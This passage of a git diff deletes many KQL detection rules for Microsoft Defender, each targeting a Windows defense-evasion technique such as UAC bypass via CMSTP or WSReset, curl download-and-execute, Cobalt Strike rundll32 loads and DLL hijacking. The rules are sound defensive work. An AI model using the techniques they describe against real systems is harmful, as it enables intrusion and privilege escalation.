-| where ((ProcessCommandLine endswith "regasm.exe" and FolderPath endswith "\\regasm.exe") or (ProcessCommandLine endswith "regsvcs.exe" and FolderPath endswith "\\regsvcs.exe") or (ProcessCommandLine endswith "regsvr32.exe" and FolderPath endswith "\\regsvr32.exe") or (ProcessCommandLine endswith "rundll32.exe" and FolderPath endswith "\\rundll32.exe") or (ProcessCommandLine endswith "WerFault.exe" and FolderPath endswith "\\WerFault.exe")) and (not((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\EdgeUpdate\\Install\\{"))) and (not((ProcessCommandLine endswith "rundll32.exe" and FolderPath endswith "\\rundll32.exe" and InitiatingProcessCommandLine contains "--uninstall --channel=stable" and (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Google\\Chrome\\Application\\") and InitiatingProcessFolderPath endswith "\\Installer\\setup.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Base64_Encoded_PowerShell_Command_Detected.kql b/Defense Evasion/Base64_Encoded_PowerShell_Command_Detected.kql
deleted file mode 100644
index 91362173..00000000
--- a/Defense Evasion/Base64_Encoded_PowerShell_Command_Detected.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2020/01/29
-// Level: high
-// Description: Detects usage of the "FromBase64String" function in the commandline which is used to decode a base64 encoded string
-// Tags: attack.t1027, attack.defense_evasion, attack.t1140, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "::FromBase64String("
\ No newline at end of file
diff --git a/Defense Evasion/Binary_Proxy_Execution_Via_Dotnet-Trace.EXE.kql b/Defense Evasion/Binary_Proxy_Execution_Via_Dotnet-Trace.EXE.kql
deleted file mode 100644
index 75e530fc..00000000
--- a/Defense Evasion/Binary_Proxy_Execution_Via_Dotnet-Trace.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jimmy Bayne (@bohops)
-// Date: 2024/01/02
-// Level: medium
-// Description: Detects commandline arguments for executing a child process via dotnet-trace.exe
-// Tags: attack.execution, attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-- " and ProcessCommandLine contains "collect") and (FolderPath endswith "\\dotnet-trace.exe" or ProcessVersionInfoOriginalFileName =~ "dotnet-trace.dll")
\ No newline at end of file
diff --git a/Defense Evasion/Blackbyte_Ransomware_Registry.kql b/Defense Evasion/Blackbyte_Ransomware_Registry.kql
deleted file mode 100644
index c3f67c1d..00000000
--- a/Defense Evasion/Blackbyte_Ransomware_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/24
-// Level: high
-// Description: BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey in~ ("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLinkedConnections", "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Control\\FileSystem\\LongPathsEnabled"))
\ No newline at end of file
diff --git a/Defense Evasion/Bypass_UAC_Using_DelegateExecute.kql b/Defense Evasion/Bypass_UAC_Using_DelegateExecute.kql
deleted file mode 100644
index 76abcf3f..00000000
--- a/Defense Evasion/Bypass_UAC_Using_DelegateExecute.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/05
-// Level: high
-// Description: Bypasses User Account Control using a fileless method
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryValueData =~ "(Empty)" and RegistryKey endswith "\\open\\command\\DelegateExecute"
\ No newline at end of file
diff --git a/Defense Evasion/Bypass_UAC_Using_SilentCleanup_Task.kql b/Defense Evasion/Bypass_UAC_Using_SilentCleanup_Task.kql
deleted file mode 100644
index 59a7340a..00000000
--- a/Defense Evasion/Bypass_UAC_Using_SilentCleanup_Task.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113, Nextron Systems
-// Date: 2022/01/06
-// Level: high
-// Description: Detects the setting of the environement variable "windir" to a non default value.
-Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task.
-The SilentCleanup task located in %windir%\system32\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC.
-
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryKey endswith "\\Environment\\windir" and (not(RegistryValueData =~ "%SystemRoot%"))
\ No newline at end of file
diff --git a/Defense Evasion/Bypass_UAC_via_CMSTP.kql b/Defense Evasion/Bypass_UAC_via_CMSTP.kql
deleted file mode 100644
index 8ff3d7ea..00000000
--- a/Defense Evasion/Bypass_UAC_via_CMSTP.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
-// Date: 2019/10/24
-// Level: high
-// Description: Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002, attack.t1218.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/s" or ProcessCommandLine contains "-s" or ProcessCommandLine contains "/au" or ProcessCommandLine contains "-au" or ProcessCommandLine contains "/ni" or ProcessCommandLine contains "-ni") and (FolderPath endswith "\\cmstp.exe" or ProcessVersionInfoOriginalFileName =~ "CMSTP.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/Bypass_UAC_via_WSReset.exe.kql b/Defense Evasion/Bypass_UAC_via_WSReset.exe.kql
deleted file mode 100644
index 3524a28c..00000000
--- a/Defense Evasion/Bypass_UAC_via_WSReset.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth
-// Date: 2019/10/24
-// Level: high
-// Description: Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\wsreset.exe" and (not((FolderPath endswith "\\conhost.exe" or ProcessVersionInfoOriginalFileName =~ "CONHOST.EXE")))
\ No newline at end of file
diff --git a/Defense Evasion/C#_IL_Code_Compilation_Via_Ilasm.EXE.kql b/Defense Evasion/C#_IL_Code_Compilation_Via_Ilasm.EXE.kql
deleted file mode 100644
index 72baadb5..00000000
--- a/Defense Evasion/C#_IL_Code_Compilation_Via_Ilasm.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/05/07
-// Level: medium
-// Description: Detects the use of "Ilasm.EXE" in order to compile C# intermediate (IL) code to EXE or DLL.
-// Tags: attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /dll" or ProcessCommandLine contains " /exe") and (FolderPath endswith "\\ilasm.exe" or ProcessVersionInfoOriginalFileName =~ "ilasm.exe")
\ No newline at end of file
diff --git a/Defense Evasion/CMSTP_Execution_Process_Creation.kql b/Defense Evasion/CMSTP_Execution_Process_Creation.kql
deleted file mode 100644
index 32254f8e..00000000
--- a/Defense Evasion/CMSTP_Execution_Process_Creation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nik Seetharaman
-// Date: 2018/07/16
-// Level: high
-// Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
-// Tags: attack.defense_evasion, attack.execution, attack.t1218.003, attack.g0069, car.2019-04-001
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\cmstp.exe"
\ No newline at end of file
diff --git a/Defense Evasion/CMSTP_Execution_Registry_Event.kql b/Defense Evasion/CMSTP_Execution_Registry_Event.kql
deleted file mode 100644
index fc5cd431..00000000
--- a/Defense Evasion/CMSTP_Execution_Registry_Event.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nik Seetharaman
-// Date: 2018/07/16
-// Level: high
-// Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
-// Tags: attack.defense_evasion, attack.execution, attack.t1218.003, attack.g0069, car.2019-04-001
-DeviceRegistryEvents
-| where RegistryKey contains "\\cmmgr32.exe"
\ No newline at end of file
diff --git a/Defense Evasion/CMSTP_UAC_Bypass_via_COM_Object_Access.kql b/Defense Evasion/CMSTP_UAC_Bypass_via_COM_Object_Access.kql
deleted file mode 100644
index b950101f..00000000
--- a/Defense Evasion/CMSTP_UAC_Bypass_via_COM_Object_Access.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nik Seetharaman, Christian Burkard (Nextron Systems)
-// Date: 2019/07/31
-// Level: high
-// Description: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)
-// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, attack.t1218.003, attack.g0069, car.2019-04-001
-DeviceProcessEvents
-| where (ProcessIntegrityLevel in~ ("High", "System")) and (InitiatingProcessCommandLine contains " /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" or InitiatingProcessCommandLine contains " /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}" or InitiatingProcessCommandLine contains " /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}" or InitiatingProcessCommandLine contains " /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}" or InitiatingProcessCommandLine contains " /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}") and InitiatingProcessFolderPath endswith "\\DllHost.exe"
\ No newline at end of file
diff --git a/Defense Evasion/COM_Object_Execution_via_Xwizard.EXE.kql b/Defense Evasion/COM_Object_Execution_via_Xwizard.EXE.kql
deleted file mode 100644
index a079b713..00000000
--- a/Defense Evasion/COM_Object_Execution_via_Xwizard.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/10/07
-// Level: medium
-// Description: Detects the execution of Xwizard tool with the "RunWizard" flag and a GUID like argument.
-This utility can be abused in order to run custom COM object created in the registry.
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ((ProcessCommandLine =~ "RunWizard" and ProcessCommandLine matches regex "\\{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\\}") and (FolderPath endswith "\\xwizard.exe" or ProcessVersionInfoOriginalFileName =~ "xwizard.exe")) or ((ProcessCommandLine =~ "RunWizard" and ProcessCommandLine matches regex "\\{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\\}") and (not((FolderPath endswith "\\xwizard.exe" or ProcessVersionInfoOriginalFileName =~ "xwizard.exe"))))
\ No newline at end of file
diff --git a/Defense Evasion/Certificate_Exported_Via_Certutil.EXE.kql b/Defense Evasion/Certificate_Exported_Via_Certutil.EXE.kql
deleted file mode 100644
index 8a079db6..00000000
--- a/Defense Evasion/Certificate_Exported_Via_Certutil.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/15
-// Level: medium
-// Description: Detects the execution of the certutil with the "exportPFX" flag which allows the utility to export certificates.
-// Tags: attack.defense_evasion, attack.t1027
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-exportPFX " or ProcessCommandLine contains "/exportPFX ") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Change_User_Account_Associated_with_the_FAX_Service.kql b/Defense Evasion/Change_User_Account_Associated_with_the_FAX_Service.kql
deleted file mode 100644
index ba7ae505..00000000
--- a/Defense Evasion/Change_User_Account_Associated_with_the_FAX_Service.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/07/17
-// Level: high
-// Description: Detect change of the user account associated with the FAX service to avoid the escalation problem.
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryKey =~ "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services\\Fax\\ObjectName" and (not(RegistryValueData contains "NetworkService"))
\ No newline at end of file
diff --git a/Defense Evasion/Change_Winevt_Channel_Access_Permission_Via_Registry.kql b/Defense Evasion/Change_Winevt_Channel_Access_Permission_Via_Registry.kql
deleted file mode 100644
index 948e8aaf..00000000
--- a/Defense Evasion/Change_Winevt_Channel_Access_Permission_Via_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/09/17
-// Level: high
-// Description: Detects tampering with the "ChannelAccess" registry key in order to change access to Windows event channel.
-// Tags: attack.defense_evasion, attack.t1562.002
-DeviceRegistryEvents
-| where ((RegistryValueData contains "(A;;0x1;;;LA)" or RegistryValueData contains "(A;;0x1;;;SY)" or RegistryValueData contains "(A;;0x5;;;BA)") and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels" and RegistryKey endswith "\\ChannelAccess") and (not(((InitiatingProcessFolderPath endswith "\\TiWorker.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\servicing\\TrustedInstaller.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Change_the_Fax_Dll.kql b/Defense Evasion/Change_the_Fax_Dll.kql
deleted file mode 100644
index f42ea9fd..00000000
--- a/Defense Evasion/Change_the_Fax_Dll.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/07/17
-// Level: high
-// Description: Detect possible persistence using Fax DLL load when service restart
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Software\\Microsoft\\Fax\\Device Providers" and RegistryKey contains "\\ImageName") and (not(RegistryValueData =~ "%systemroot%\\system32\\fxst30.dll"))
\ No newline at end of file
diff --git a/Defense Evasion/ClickOnce_Trust_Prompt_Tampering.kql b/Defense Evasion/ClickOnce_Trust_Prompt_Tampering.kql
deleted file mode 100644
index 37d93606..00000000
--- a/Defense Evasion/ClickOnce_Trust_Prompt_Tampering.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @SerkinValery, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/12
-// Level: medium
-// Description: Detects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet.
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "Enabled" and RegistryKey contains "\\SOFTWARE\\MICROSOFT\\.NETFramework\\Security\\TrustManager\\PromptingLevel" and (RegistryKey endswith "\\Internet" or RegistryKey endswith "\\LocalIntranet" or RegistryKey endswith "\\MyComputer" or RegistryKey endswith "\\TrustedSites" or RegistryKey endswith "\\UntrustedSites")
\ No newline at end of file
diff --git a/Defense Evasion/CobaltStrike_Load_by_Rundll32.kql b/Defense Evasion/CobaltStrike_Load_by_Rundll32.kql
deleted file mode 100644
index fe5a03e5..00000000
--- a/Defense Evasion/CobaltStrike_Load_by_Rundll32.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Wojciech Lesicki
-// Date: 2021/06/01
-// Level: high
-// Description: Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.
-// Tags: attack.defense_evasion, attack.t1218.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".dll" and (ProcessCommandLine endswith " StartW" or ProcessCommandLine endswith ",StartW")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or (ProcessCommandLine contains "rundll32.exe" or ProcessCommandLine contains "rundll32 "))
\ No newline at end of file
diff --git a/Defense Evasion/CodePage_Modification_Via_MODE.COM_To_Russian_Language.kql b/Defense Evasion/CodePage_Modification_Via_MODE.COM_To_Russian_Language.kql
deleted file mode 100644
index fe701214..00000000
--- a/Defense Evasion/CodePage_Modification_Via_MODE.COM_To_Russian_Language.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
-// Date: 2024/01/17
-// Level: medium
-// Description: Detects a CodePage modification using the "mode.com" utility to Russian language.
-This behavior has been used by threat actors behind Dharma ransomware.
-
-// Tags: attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " con " and ProcessCommandLine contains " cp " and ProcessCommandLine contains " select=") and (ProcessCommandLine endswith "=1251" or ProcessCommandLine endswith "=866")) and (FolderPath endswith "\\mode.com" or ProcessVersionInfoOriginalFileName =~ "MODE.COM")
\ No newline at end of file
diff --git a/Defense Evasion/Code_Execution_via_Pcwutl.dll.kql b/Defense Evasion/Code_Execution_via_Pcwutl.dll.kql
deleted file mode 100644
index c597db84..00000000
--- a/Defense Evasion/Code_Execution_via_Pcwutl.dll.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Julia Fomina, oscd.community
-// Date: 2020/10/05
-// Level: medium
-// Description: Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.
-// Tags: attack.defense_evasion, attack.t1218.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains "pcwutl" and ProcessCommandLine contains "LaunchApplication") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/Control_Panel_Items.kql b/Defense Evasion/Control_Panel_Items.kql
deleted file mode 100644
index de98b896..00000000
--- a/Defense Evasion/Control_Panel_Items.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)
-// Date: 2020/06/22
-// Level: high
-// Description: Detects the malicious use of a control panel item
-// Tags: attack.execution, attack.defense_evasion, attack.t1218.002, attack.persistence, attack.t1546
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "add" and ProcessCommandLine contains "CurrentVersion\\Control Panel\\CPLs") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) or (ProcessCommandLine endswith ".cpl" and (not(((ProcessCommandLine contains "regsvr32 " and ProcessCommandLine contains " /s " and ProcessCommandLine contains "igfxCPL.cpl") or (ProcessCommandLine contains "\\System32\\" or ProcessCommandLine contains "%System%" or ProcessCommandLine contains "|C:\\Windows\\system32|")))))
\ No newline at end of file
diff --git a/Defense Evasion/ConvertTo-SecureString_Cmdlet_Usage_Via_CommandLine.kql b/Defense Evasion/ConvertTo-SecureString_Cmdlet_Usage_Via_CommandLine.kql
deleted file mode 100644
index 1f4c9f72..00000000
--- a/Defense Evasion/ConvertTo-SecureString_Cmdlet_Usage_Via_CommandLine.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
-// Date: 2020/10/11
-// Level: medium
-// Description: Detects usage of the "ConvertTo-SecureString" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "ConvertTo-SecureString" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Defense Evasion/CreateDump_Process_Dump.kql b/Defense Evasion/CreateDump_Process_Dump.kql
deleted file mode 100644
index d2af686e..00000000
--- a/Defense Evasion/CreateDump_Process_Dump.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/01/04
-// Level: high
-// Description: Detects uses of the createdump.exe LOLOBIN utility to dump process memory
-// Tags: attack.defense_evasion, attack.t1036, attack.t1003.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -u " or ProcessCommandLine contains " --full " or ProcessCommandLine contains " -f " or ProcessCommandLine contains " --name " or ProcessCommandLine contains ".dmp ") and (FolderPath endswith "\\createdump.exe" or ProcessVersionInfoOriginalFileName =~ "FX_VER_INTERNALNAME_STR")
\ No newline at end of file
diff --git a/Defense Evasion/Created_Files_by_Microsoft_Sync_Center.kql b/Defense Evasion/Created_Files_by_Microsoft_Sync_Center.kql
deleted file mode 100644
index ef6299fb..00000000
--- a/Defense Evasion/Created_Files_by_Microsoft_Sync_Center.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: elhoim
-// Date: 2022/04/28
-// Level: medium
-// Description: This rule detects suspicious files created by Microsoft Sync Center (mobsync)
-// Tags: attack.t1055, attack.t1218, attack.execution, attack.defense_evasion
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\mobsync.exe" and (FolderPath endswith ".dll" or FolderPath endswith ".exe")
\ No newline at end of file
diff --git a/Defense Evasion/Creation_Of_Non-Existent_System_DLL.kql b/Defense Evasion/Creation_Of_Non-Existent_System_DLL.kql
deleted file mode 100644
index 973ed62c..00000000
--- a/Defense Evasion/Creation_Of_Non-Existent_System_DLL.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), fornotes
-// Date: 2022/12/01
-// Level: medium
-// Description: Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories).
-Usually this technique is used to achieve DLL hijacking.
-
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceFileEvents
-| where FolderPath endswith ":\\Windows\\System32\\TSMSISrv.dll" or FolderPath endswith ":\\Windows\\System32\\TSVIPSrv.dll" or FolderPath endswith ":\\Windows\\System32\\wbem\\wbemcomn.dll" or FolderPath endswith ":\\Windows\\System32\\WLBSCTRL.dll" or FolderPath endswith ":\\Windows\\System32\\wow64log.dll" or FolderPath endswith ":\\Windows\\System32\\WptsExtensions.dll" or FolderPath endswith "\\SprintCSP.dll"
\ No newline at end of file
diff --git a/Defense Evasion/Creation_of_an_WerFault.exe_in_Unusual_Folder.kql b/Defense Evasion/Creation_of_an_WerFault.exe_in_Unusual_Folder.kql
deleted file mode 100644
index f9303a14..00000000
--- a/Defense Evasion/Creation_of_an_WerFault.exe_in_Unusual_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/05/09
-// Level: high
-// Description: Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking
-// Tags: attack.persistence, attack.defense_evasion, attack.t1574.001
-DeviceFileEvents
-| where (FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\wer.dll") and (not((FolderPath contains "\\System32\\" or FolderPath contains "\\SysWOW64\\" or FolderPath contains "\\WinSxS\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Csc.EXE_Execution_Form_Potentially_Suspicious_Parent.kql b/Defense Evasion/Csc.EXE_Execution_Form_Potentially_Suspicious_Parent.kql
deleted file mode 100644
index 544ae6eb..00000000
--- a/Defense Evasion/Csc.EXE_Execution_Form_Potentially_Suspicious_Parent.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
-// Date: 2019/02/11
-// Level: high
-// Description: Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery.
-// Tags: attack.execution, attack.t1059.005, attack.t1059.007, attack.defense_evasion, attack.t1218.005, attack.t1027.004
-DeviceProcessEvents
-| where (FolderPath endswith "\\csc.exe" or ProcessVersionInfoOriginalFileName =~ "csc.exe") and ((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or ((InitiatingProcessCommandLine contains "-Encoded " or InitiatingProcessCommandLine contains "FromBase64String") and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) or (InitiatingProcessCommandLine matches regex "([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\\\[Aa]pp[Dd]ata\\\\([Ll]ocal([Ll]ow)?|[Rr]oaming))\\\\[^\\\\]{1,256}$" or (InitiatingProcessCommandLine contains ":\\PerfLogs\\" or InitiatingProcessCommandLine contains ":\\Users\\Public\\" or InitiatingProcessCommandLine contains ":\\Windows\\Temp\\" or InitiatingProcessCommandLine contains "\\Temporary Internet") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Favorites\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Favourites\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Contacts\\") or (InitiatingProcessCommandLine contains 
":\\Users\\" and InitiatingProcessCommandLine contains "\\Pictures\\"))) and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\sdiagnhost.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\inetsrv\\w3wp.exe"))) and (not(((InitiatingProcessCommandLine contains "JwB7ACIAZgBhAGkAbABlAGQAIgA6AHQAcgB1AGUALAAiAG0AcwBnACIAOgAiAEEAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcgAiAH0AJw" or InitiatingProcessCommandLine contains "cAewAiAGYAYQBpAGwAZQBkACIAOgB0AHIAdQBlACwAIgBtAHMAZwAiADoAIgBBAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIAIgB9ACcA" or InitiatingProcessCommandLine contains "nAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnA") or InitiatingProcessFolderPath =~ "C:\\ProgramData\\chocolatey\\choco.exe" or InitiatingProcessCommandLine contains "\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection"))) \ No newline at end of file diff --git a/Defense Evasion/Curl_Download_And_Execute_Combination.kql b/Defense Evasion/Curl_Download_And_Execute_Combination.kql deleted file mode 100644 index a0dd325c..00000000 --- a/Defense Evasion/Curl_Download_And_Execute_Combination.kql +++ /dev/null 
@@ -1,7 +0,0 @@
-// Author: Sreeman, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/01/13
-// Level: high
-// Description: Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.
-// Tags: attack.defense_evasion, attack.t1218, attack.command_and_control, attack.t1105
-DeviceProcessEvents
-| where (ProcessCommandLine contains "curl " and ProcessCommandLine contains "http" and ProcessCommandLine contains "-o" and ProcessCommandLine contains "&") and (ProcessCommandLine contains " -c " or ProcessCommandLine contains " /c ")
\ No newline at end of file
diff --git a/Defense Evasion/Custom_File_Open_Handler_Executes_PowerShell.kql b/Defense Evasion/Custom_File_Open_Handler_Executes_PowerShell.kql
deleted file mode 100644
index 40bbb2ff..00000000
--- a/Defense Evasion/Custom_File_Open_Handler_Executes_PowerShell.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: CD_R0M_
-// Date: 2022/06/11
-// Level: high
-// Description: Detects the abuse of custom file open handler, executing powershell
-// Tags: attack.defense_evasion, attack.t1202
-DeviceRegistryEvents
-| where (RegistryValueData contains "powershell" and RegistryValueData contains "-command") and RegistryKey contains "shell\\open\\command"
\ No newline at end of file
diff --git a/Defense Evasion/DHCP_Callout_DLL_Installation.kql b/Defense Evasion/DHCP_Callout_DLL_Installation.kql
deleted file mode 100644
index 67ddb9cc..00000000
--- a/Defense Evasion/DHCP_Callout_DLL_Installation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Dimitrios Slamaris
-// Date: 2017/05/15
-// Level: high
-// Description: Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)
-// Tags: attack.defense_evasion, attack.t1574.002, attack.t1112
-DeviceRegistryEvents
-| where RegistryKey endswith "\\Services\\DHCPServer\\Parameters\\CalloutDlls" or RegistryKey endswith "\\Services\\DHCPServer\\Parameters\\CalloutEnabled"
